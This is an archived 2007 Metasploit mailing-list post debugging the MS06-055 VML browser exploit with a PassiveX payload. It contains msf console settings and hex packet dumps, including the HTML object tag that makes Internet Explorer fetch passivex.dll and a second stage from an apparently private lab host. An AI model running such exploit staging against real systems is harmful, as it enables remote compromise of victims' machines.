PassiveX-based payloads and MS06-055

[buffer at softmedia.info (Angelo Dell'Aera)]

Il giorno Wed, 14 Mar 2007 23:03:41 -0700
mmiller at hick.org ha scritto:


> Hmm, from these logs it looks like it's working.  'p' is set to a proc
> that is defined in passivex.rb, which is correct.  It looks like the
> text just line-wrapped.  Since it says 'Sending PassiveX...', that
> means that it at least handled the initial request and sent it to the
> correct page which contains the object tag.  However, it looks like
> the browser didn't attempt to download the control.  Do you happen to
> be running this exploit in a non-administrative account?  Internet
> explorer won't download ActiveX controls as non-admin.
> Alternatively, can you try browsing to the page hosting PX in
> Internet Explorer, since it seems like you're getting farther now
> than before?


Matt,
something is moving here but we're not still at the end of the game. 
I noticed that the problem while handling the PXURI resource was 
not a real problem but it's worth mentioning. 

While setting the environment variables, the handling is not correctly
done if the / in the PXURI is not properly escaped (and my apologies
for this).

msf exploit(ms06_055_vml_method) > set URIPATH uripath
URIPATH => uripath
msf exploit(ms06_055_vml_method) > set PXURI "/pxuri"
PXURI => /pxuri

Taking a step further there's still no luck in owning the box. Take a
look at this please. This happens in the second stage of the exploit
when the client is trying to getting PXURI.

The browser request...

0x0000:  4500 00f4 0177 4000 8006 3437 c0a8 2183 E....w at ...47..!.
0x0010:  c0a8 2182 042b 1f90 0553 dcd2 7073 2c77  ..!..+...S..ps,w
0x0020:  5018 faf0 1ebe 0000 4745 5420 2f70 7875 P.......GET./pxu
0x0030:  7269 2048 5454 502f 312e 310d 0a41 6363 ri.HTTP/1.1..Acc
0x0040:  6570 743a 202a 2f2a 0d0a 4163 6365 7074 ept:.*/*..Accept
0x0050:  2d4c 616e 6775 6167 653a 2069 740d 0a41 -Language:.it..A
0x0060:  6363 6570 742d 456e 636f 6469 6e67 3a20 ccept-Encoding:.
0x0070:  677a 6970 2c20 6465 666c 6174 650d 0a55 gzip,.deflate..U
0x0080:  7365 722d 4167 656e 743a 204d 6f7a 696c ser-Agent:.Mozil
0x0090:  6c61 2f34 2e30 2028 636f 6d70 6174 6962 la/4.0.(compatib
0x00a0:  6c65 3b20 4d53 4945 2036 2e30 3b20 5769 le;.MSIE.6.0;.Wi
0x00b0:  6e64 6f77 7320 4e54 2035 2e31 290d 0a48 ndows.NT.5.1)..H
0x00c0:  6f73 743a 2031 3932 2e31 3638 2e33 332e ost:.192.168.33.
0x00d0:  3133 303a 3830 3830 0d0a 436f 6e6e 6563 130:8080..Connec
0x00e0:  7469 6f6e 3a20 4b65 6570 2d41 6c69 7665 tion:.Keep-Alive
0x00f0:  0d0a 0d0a                                ....

and Metasploit response...

0x0000:  4500 01e2 71de 4000 4006 02e2 c0a8 2182 E...q. at .@.....!.
0x0010:  c0a8 2183 1f90 042b 7073 2c77 0553 dd9e  ..!....+ps,w.S..
0x0020:  5018 1920 3b57 0000 4854 5450 2f31 2e31 P...;W..HTTP/1.1
0x0030:  2032 3030 204f 4b0d 0a53 6572 7665 723a  .200.OK..Server:
0x0040:  2041 7061 6368 650d 0a43 6f6e 7465 6e74  .Apache..Content
0x0050:  2d54 7970 653a 2074 6578 742f 6874 6d6c -Type:.text/html
0x0060:  0d0a 436f 6e74 656e 742d 4c65 6e67 7468  ..Content-Length
0x0070:  3a20 3333 370d 0a43 6f6e 6e65 6374 696f  :.337..Connectio
0x0080:  6e3a 204b 6565 702d 416c 6976 650d 0a0d n:.Keep-Alive...
0x0090:  0a3c 6874 6d6c 3e09 3c6f 626a 6563 7420  .<html>.<object.
0x00a0:  636c 6173 7369 643d 2243 4c53 4944 3a42 classid="CLSID:B
0x00b0:  3341 4337 3330 372d 4645 4145 2d34 6534 3AC7307-FEAE-4e4
0x00c0:  332d 4232 4436 2d31 3631 4536 3841 4241 3-B2D6-161E68ABA
0x00d0:  3833 3822 2063 6f64 6562 6173 653d 222f 838 ".codebase="/
0x00e0:  7078 7572 692f 7061 7373 6976 6578 2e64 pxuri/passivex.d
0x00f0:  6c6c 232d 312c 2d31 2c2d 312c 2d31 223e ll#-1,-1,-1,-1">
0x0100:  0909 3c70 6172 616d 206e 616d 653d 2248  ..<param.name="H
0x0110:  7474 7048 6f73 7422 2076 616c 7565 3d22 ttpHost".value="
0x0120:  3139 322e 3136 382e 3333 2e31 3330 223e 192.168.33.130">
0x0130:  0909 3c70 6172 616d 206e 616d 653d 2248  ..<param.name="H
0x0140:  7474 7050 6f72 7422 2076 616c 7565 3d22 ttpPort".value="
0x0150:  3830 3830 223e 0909 3c70 6172 616d 206e 8080">..<param.n
0x0160:  616d 653d 2248 7474 7055 7269 4261 7365 ame="HttpUriBase
0x0170:  2220 7661 6c75 653d 222f 7078 7572 6922 ".value="/pxuri"
0x0180:  3e09 093c 7061 7261 6d20 6e61 6d65 3d22 >..<param.name="
0x0190:  4874 7470 5369 6422 2076 616c 7565 3d22 HttpSid".value="
0x01a0:  3222 3e09 093c 7061 7261 6d20 6e61 6d65 2">..<param.name
0x01b0:  3d22 446f 776e 6c6f 6164 5365 636f 6e64 ="DownloadSecond
0x01c0:  5374 6167 6522 2076 616c 7565 3d22 3122 Stage".value="1"
0x01d0:  3e09 3c2f 6f62 6a65 6374 3e3c 2f68 746d >.</object></htm
0x01e0:  6c3e                                   l>

followed by a FIN/ACK which is then ACKed by the browser. After this
nothing else. Everything seems correct at a first glance but IE doesn't
go on in downloading the ActiveX control.

FYI answering to the question in your reply I'm running this exploit as
Administrator. I even tried disabling any kind of protection against
ActiveX downloading and executing in every Internet Zone but still
nothing.


Regards,

-- 

Angelo Dell'Aera 'buffer' 
Antifork Research, Inc.         http://buffer.antifork.org
Metro Olografix

PGP information in e-mail header


-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070316/486c8af5/attachment.pgp>